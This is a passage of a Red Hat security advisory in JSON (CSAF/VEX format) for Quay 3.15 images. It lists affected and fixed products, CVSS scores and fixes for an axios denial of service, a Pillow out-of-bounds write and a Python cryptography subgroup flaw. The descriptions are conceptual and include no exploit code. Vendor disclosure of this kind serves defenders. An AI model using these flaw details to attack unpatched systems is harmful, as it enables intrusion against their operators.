"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:8acebb6bd51def60517b03f92103cecfadfc8e7fce42e4a002cb9c9271915b6b_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:be166b843cc21b3942850443c0f802406f397f71959654a45e17a24fdcb0606a_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:c72dd9dd58db8ebcdc9b4daa433840411636e3dea82b21ca191fd0d272e636ec_amd64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:0a1c4f139b35d13aa4b3f6508919e25d3bbfdf588337704c1fc8cc7085bc2eb2_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:35047410a723f6e5b71137b7c6de497eed464dc1528419645cb308f2fd0696d6_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:76c0db9a4d4fcb45502d9d852f23a96aee91990217e19b519f7608eeb377eb22_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:ebdb8e8b383adc86e78fbed0937c27bead67d0b6cb897a93c1558fd265696a1b_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:88854cbe000c3d84ee1000f1d350332eb861a031ece1e1ce0a4f85bcd1eb584e_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:a1d9c6f2f614dcea14f3b4564e69fe9ca894c9498fd08c5fdaa3616768ccedc3_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:d6ab62eec5e5489daa85fdda283e86c96101f7d576432d5a4b2865e4fdb0dbf1_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:7b129e1319cc2f0edb134149b2cfecc021ca552cfede24d74d4631c3019e233e_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:2970429dcb7f99abf0d0cef4fa59346c90f129ae46d6e746d128b13e55616e06_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:5c02fe25ab73d531f543a673997170b5079c59c93e6ea240e795bfe6520782e3_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:9d81c106c68fab8c44dcd4c14698be0b8c76862885483ae20c5aa83c8334c805_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:25b0676b9bb2e564fc64b43567ca4e3acda0a9d6ea405f2f8134b0e36b27b701_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:3681b3bb7257b54ea71d65370158e52d7165cc1038c129ea0266af21a773a022_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:cde4dc0f20b553550d6009ebc105e5cc80fbdd21d200f3d63f6c435f4addd804_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:ee7bf66cbb9116521d74e87d5a1b260bcce7634100aab7602149ad2c5bed4c72_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-bundle@sha256:dec2520d12b13cd73ebceb03a82daddfff4b06e57e993268ea52cd21c0136147_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:26a62adcd46e5f84dff66336ccf9392a5bb8369b042dd01c3528ade17c6efa55_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:8429e68dd8a1f4dc768304d17cd61beb772c0bcf5a4137d626b0a7333204d116_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:e5da14b11a892cc6cad89703d6415b95a47065fa2b1eb308c395579e9cce392a_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:8acebb6bd51def60517b03f92103cecfadfc8e7fce42e4a002cb9c9271915b6b_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:be166b843cc21b3942850443c0f802406f397f71959654a45e17a24fdcb0606a_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:c72dd9dd58db8ebcdc9b4daa433840411636e3dea82b21ca191fd0d272e636ec_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "axios: Axios affected by Denial of Service via __proto__ Key in mergeConfig"
},
{
"cve": "CVE-2026-25990",
"cwe": {
"id": "CWE-787",
"name": "Out-of-bounds Write"
},
"discovery_date": "2026-02-11T21:05:39.535631+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:0a1c4f139b35d13aa4b3f6508919e25d3bbfdf588337704c1fc8cc7085bc2eb2_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:35047410a723f6e5b71137b7c6de497eed464dc1528419645cb308f2fd0696d6_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:76c0db9a4d4fcb45502d9d852f23a96aee91990217e19b519f7608eeb377eb22_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:ebdb8e8b383adc86e78fbed0937c27bead67d0b6cb897a93c1558fd265696a1b_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:88854cbe000c3d84ee1000f1d350332eb861a031ece1e1ce0a4f85bcd1eb584e_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:a1d9c6f2f614dcea14f3b4564e69fe9ca894c9498fd08c5fdaa3616768ccedc3_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:d6ab62eec5e5489daa85fdda283e86c96101f7d576432d5a4b2865e4fdb0dbf1_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:7b129e1319cc2f0edb134149b2cfecc021ca552cfede24d74d4631c3019e233e_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:2970429dcb7f99abf0d0cef4fa59346c90f129ae46d6e746d128b13e55616e06_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:5c02fe25ab73d531f543a673997170b5079c59c93e6ea240e795bfe6520782e3_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:9d81c106c68fab8c44dcd4c14698be0b8c76862885483ae20c5aa83c8334c805_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:25b0676b9bb2e564fc64b43567ca4e3acda0a9d6ea405f2f8134b0e36b27b701_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:3681b3bb7257b54ea71d65370158e52d7165cc1038c129ea0266af21a773a022_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:cde4dc0f20b553550d6009ebc105e5cc80fbdd21d200f3d63f6c435f4addd804_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:ee7bf66cbb9116521d74e87d5a1b260bcce7634100aab7602149ad2c5bed4c72_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-bundle@sha256:dec2520d12b13cd73ebceb03a82daddfff4b06e57e993268ea52cd21c0136147_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:26a62adcd46e5f84dff66336ccf9392a5bb8369b042dd01c3528ade17c6efa55_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:8429e68dd8a1f4dc768304d17cd61beb772c0bcf5a4137d626b0a7333204d116_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:e5da14b11a892cc6cad89703d6415b95a47065fa2b1eb308c395579e9cce392a_ppc64le"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2439170"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found the Pillow Python imaging library. Providing a specially crafted PSD image may lead to an out-of-bounds write. This could potentially allow for arbitrary code execution or information disclosure.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "pillow: Pillow: Out-of-bounds Write via Specially Crafted PSD Image",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:8acebb6bd51def60517b03f92103cecfadfc8e7fce42e4a002cb9c9271915b6b_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:be166b843cc21b3942850443c0f802406f397f71959654a45e17a24fdcb0606a_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:c72dd9dd58db8ebcdc9b4daa433840411636e3dea82b21ca191fd0d272e636ec_amd64"
],
"known_not_affected": [
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:0a1c4f139b35d13aa4b3f6508919e25d3bbfdf588337704c1fc8cc7085bc2eb2_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:35047410a723f6e5b71137b7c6de497eed464dc1528419645cb308f2fd0696d6_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:76c0db9a4d4fcb45502d9d852f23a96aee91990217e19b519f7608eeb377eb22_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:ebdb8e8b383adc86e78fbed0937c27bead67d0b6cb897a93c1558fd265696a1b_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:88854cbe000c3d84ee1000f1d350332eb861a031ece1e1ce0a4f85bcd1eb584e_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:a1d9c6f2f614dcea14f3b4564e69fe9ca894c9498fd08c5fdaa3616768ccedc3_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:d6ab62eec5e5489daa85fdda283e86c96101f7d576432d5a4b2865e4fdb0dbf1_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:7b129e1319cc2f0edb134149b2cfecc021ca552cfede24d74d4631c3019e233e_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:2970429dcb7f99abf0d0cef4fa59346c90f129ae46d6e746d128b13e55616e06_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:5c02fe25ab73d531f543a673997170b5079c59c93e6ea240e795bfe6520782e3_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:9d81c106c68fab8c44dcd4c14698be0b8c76862885483ae20c5aa83c8334c805_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:25b0676b9bb2e564fc64b43567ca4e3acda0a9d6ea405f2f8134b0e36b27b701_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:3681b3bb7257b54ea71d65370158e52d7165cc1038c129ea0266af21a773a022_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:cde4dc0f20b553550d6009ebc105e5cc80fbdd21d200f3d63f6c435f4addd804_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:ee7bf66cbb9116521d74e87d5a1b260bcce7634100aab7602149ad2c5bed4c72_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-bundle@sha256:dec2520d12b13cd73ebceb03a82daddfff4b06e57e993268ea52cd21c0136147_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:26a62adcd46e5f84dff66336ccf9392a5bb8369b042dd01c3528ade17c6efa55_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:8429e68dd8a1f4dc768304d17cd61beb772c0bcf5a4137d626b0a7333204d116_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:e5da14b11a892cc6cad89703d6415b95a47065fa2b1eb308c395579e9cce392a_ppc64le"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-25990"
},
{
"category": "external",
"summary": "RHBZ#2439170",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2439170"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-25990",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-25990"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-25990",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25990"
},
{
"category": "external",
"summary": "https://github.com/python-pillow/Pillow/commit/9000313cc5d4a31bdcdd6d7f0781101abab553aa",
"url": "https://github.com/python-pillow/Pillow/commit/9000313cc5d4a31bdcdd6d7f0781101abab553aa"
},
{
"category": "external",
"summary": "https://github.com/python-pillow/Pillow/security/advisories/GHSA-cfh3-3jmp-rvhc",
"url": "https://github.com/python-pillow/Pillow/security/advisories/GHSA-cfh3-3jmp-rvhc"
}
],
"release_date": "2026-02-11T20:53:52.524000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-04-03T22:07:28+00:00",
"details": "Before applying this update, make sure all previously released errata relevant\nto your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:8acebb6bd51def60517b03f92103cecfadfc8e7fce42e4a002cb9c9271915b6b_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:be166b843cc21b3942850443c0f802406f397f71959654a45e17a24fdcb0606a_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:c72dd9dd58db8ebcdc9b4daa433840411636e3dea82b21ca191fd0d272e636ec_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:6568"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:0a1c4f139b35d13aa4b3f6508919e25d3bbfdf588337704c1fc8cc7085bc2eb2_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:35047410a723f6e5b71137b7c6de497eed464dc1528419645cb308f2fd0696d6_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:76c0db9a4d4fcb45502d9d852f23a96aee91990217e19b519f7608eeb377eb22_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:ebdb8e8b383adc86e78fbed0937c27bead67d0b6cb897a93c1558fd265696a1b_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:88854cbe000c3d84ee1000f1d350332eb861a031ece1e1ce0a4f85bcd1eb584e_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:a1d9c6f2f614dcea14f3b4564e69fe9ca894c9498fd08c5fdaa3616768ccedc3_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:d6ab62eec5e5489daa85fdda283e86c96101f7d576432d5a4b2865e4fdb0dbf1_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:7b129e1319cc2f0edb134149b2cfecc021ca552cfede24d74d4631c3019e233e_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:2970429dcb7f99abf0d0cef4fa59346c90f129ae46d6e746d128b13e55616e06_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:5c02fe25ab73d531f543a673997170b5079c59c93e6ea240e795bfe6520782e3_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:9d81c106c68fab8c44dcd4c14698be0b8c76862885483ae20c5aa83c8334c805_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:25b0676b9bb2e564fc64b43567ca4e3acda0a9d6ea405f2f8134b0e36b27b701_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:3681b3bb7257b54ea71d65370158e52d7165cc1038c129ea0266af21a773a022_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:cde4dc0f20b553550d6009ebc105e5cc80fbdd21d200f3d63f6c435f4addd804_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:ee7bf66cbb9116521d74e87d5a1b260bcce7634100aab7602149ad2c5bed4c72_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-bundle@sha256:dec2520d12b13cd73ebceb03a82daddfff4b06e57e993268ea52cd21c0136147_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:26a62adcd46e5f84dff66336ccf9392a5bb8369b042dd01c3528ade17c6efa55_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:8429e68dd8a1f4dc768304d17cd61beb772c0bcf5a4137d626b0a7333204d116_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:e5da14b11a892cc6cad89703d6415b95a47065fa2b1eb308c395579e9cce392a_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:8acebb6bd51def60517b03f92103cecfadfc8e7fce42e4a002cb9c9271915b6b_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:be166b843cc21b3942850443c0f802406f397f71959654a45e17a24fdcb0606a_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:c72dd9dd58db8ebcdc9b4daa433840411636e3dea82b21ca191fd0d272e636ec_amd64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 7.3,
"baseSeverity": "HIGH",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L",
"version": "3.1"
},
"products": [
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:0a1c4f139b35d13aa4b3f6508919e25d3bbfdf588337704c1fc8cc7085bc2eb2_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:35047410a723f6e5b71137b7c6de497eed464dc1528419645cb308f2fd0696d6_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:76c0db9a4d4fcb45502d9d852f23a96aee91990217e19b519f7608eeb377eb22_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:ebdb8e8b383adc86e78fbed0937c27bead67d0b6cb897a93c1558fd265696a1b_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:88854cbe000c3d84ee1000f1d350332eb861a031ece1e1ce0a4f85bcd1eb584e_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:a1d9c6f2f614dcea14f3b4564e69fe9ca894c9498fd08c5fdaa3616768ccedc3_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:d6ab62eec5e5489daa85fdda283e86c96101f7d576432d5a4b2865e4fdb0dbf1_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:7b129e1319cc2f0edb134149b2cfecc021ca552cfede24d74d4631c3019e233e_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:2970429dcb7f99abf0d0cef4fa59346c90f129ae46d6e746d128b13e55616e06_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:5c02fe25ab73d531f543a673997170b5079c59c93e6ea240e795bfe6520782e3_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:9d81c106c68fab8c44dcd4c14698be0b8c76862885483ae20c5aa83c8334c805_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:25b0676b9bb2e564fc64b43567ca4e3acda0a9d6ea405f2f8134b0e36b27b701_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:3681b3bb7257b54ea71d65370158e52d7165cc1038c129ea0266af21a773a022_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:cde4dc0f20b553550d6009ebc105e5cc80fbdd21d200f3d63f6c435f4addd804_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:ee7bf66cbb9116521d74e87d5a1b260bcce7634100aab7602149ad2c5bed4c72_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-bundle@sha256:dec2520d12b13cd73ebceb03a82daddfff4b06e57e993268ea52cd21c0136147_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:26a62adcd46e5f84dff66336ccf9392a5bb8369b042dd01c3528ade17c6efa55_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:8429e68dd8a1f4dc768304d17cd61beb772c0bcf5a4137d626b0a7333204d116_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:e5da14b11a892cc6cad89703d6415b95a47065fa2b1eb308c395579e9cce392a_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:8acebb6bd51def60517b03f92103cecfadfc8e7fce42e4a002cb9c9271915b6b_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:be166b843cc21b3942850443c0f802406f397f71959654a45e17a24fdcb0606a_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:c72dd9dd58db8ebcdc9b4daa433840411636e3dea82b21ca191fd0d272e636ec_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "pillow: Pillow: Out-of-bounds Write via Specially Crafted PSD Image"
},
{
"cve": "CVE-2026-26007",
"cwe": {
"id": "CWE-354",
"name": "Improper Validation of Integrity Check Value"
},
"discovery_date": "2026-02-10T22:01:01.036116+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:0a1c4f139b35d13aa4b3f6508919e25d3bbfdf588337704c1fc8cc7085bc2eb2_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:35047410a723f6e5b71137b7c6de497eed464dc1528419645cb308f2fd0696d6_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:76c0db9a4d4fcb45502d9d852f23a96aee91990217e19b519f7608eeb377eb22_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:ebdb8e8b383adc86e78fbed0937c27bead67d0b6cb897a93c1558fd265696a1b_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:88854cbe000c3d84ee1000f1d350332eb861a031ece1e1ce0a4f85bcd1eb584e_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:a1d9c6f2f614dcea14f3b4564e69fe9ca894c9498fd08c5fdaa3616768ccedc3_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:d6ab62eec5e5489daa85fdda283e86c96101f7d576432d5a4b2865e4fdb0dbf1_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:7b129e1319cc2f0edb134149b2cfecc021ca552cfede24d74d4631c3019e233e_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:2970429dcb7f99abf0d0cef4fa59346c90f129ae46d6e746d128b13e55616e06_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:5c02fe25ab73d531f543a673997170b5079c59c93e6ea240e795bfe6520782e3_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:9d81c106c68fab8c44dcd4c14698be0b8c76862885483ae20c5aa83c8334c805_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:25b0676b9bb2e564fc64b43567ca4e3acda0a9d6ea405f2f8134b0e36b27b701_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:3681b3bb7257b54ea71d65370158e52d7165cc1038c129ea0266af21a773a022_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:cde4dc0f20b553550d6009ebc105e5cc80fbdd21d200f3d63f6c435f4addd804_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:ee7bf66cbb9116521d74e87d5a1b260bcce7634100aab7602149ad2c5bed4c72_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-bundle@sha256:dec2520d12b13cd73ebceb03a82daddfff4b06e57e993268ea52cd21c0136147_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:26a62adcd46e5f84dff66336ccf9392a5bb8369b042dd01c3528ade17c6efa55_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:8429e68dd8a1f4dc768304d17cd61beb772c0bcf5a4137d626b0a7333204d116_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:e5da14b11a892cc6cad89703d6415b95a47065fa2b1eb308c395579e9cce392a_ppc64le"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2438762"
}
],
"notes": [
{
"category": "description",
"text": "A validation flaw has been discovered in the python cryptography package. This missing validation allows an attacker to provide a public key point P from a small-order subgroup. This can lead to security issues in various situations, such as the most commonly used signature verification (ECDSA) and shared key negotiation (ECDH). When the victim computes the shared secret as S = [victim_private_key]P via ECDH, this leaks information about victim_private_key mod (small_subgroup_order). For curves with cofactor \u003e 1, this reveals the least significant bits of the private key. When these weak public keys are used in ECDSA , it\u0027s easy to forge signatures on the small subgroup. Only SECT curves are impacted by this.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "cryptography: cryptography Subgroup Attack Due to Missing Subgroup Validation for SECT Curves",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "This flaw, while difficult to exploit, would lead to a loss of integrity in the encrypted communication channel. Given that the cryptography package is a library, it is likely to be used in situations that do not require user interaction.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:8acebb6bd51def60517b03f92103cecfadfc8e7fce42e4a002cb9c9271915b6b_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:be166b843cc21b3942850443c0f802406f397f71959654a45e17a24fdcb0606a_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:c72dd9dd58db8ebcdc9b4daa433840411636e3dea82b21ca191fd0d272e636ec_amd64"
],
"known_not_affected": [
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:0a1c4f139b35d13aa4b3f6508919e25d3bbfdf588337704c1fc8cc7085bc2eb2_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:35047410a723f6e5b71137b7c6de497eed464dc1528419645cb308f2fd0696d6_amd64",
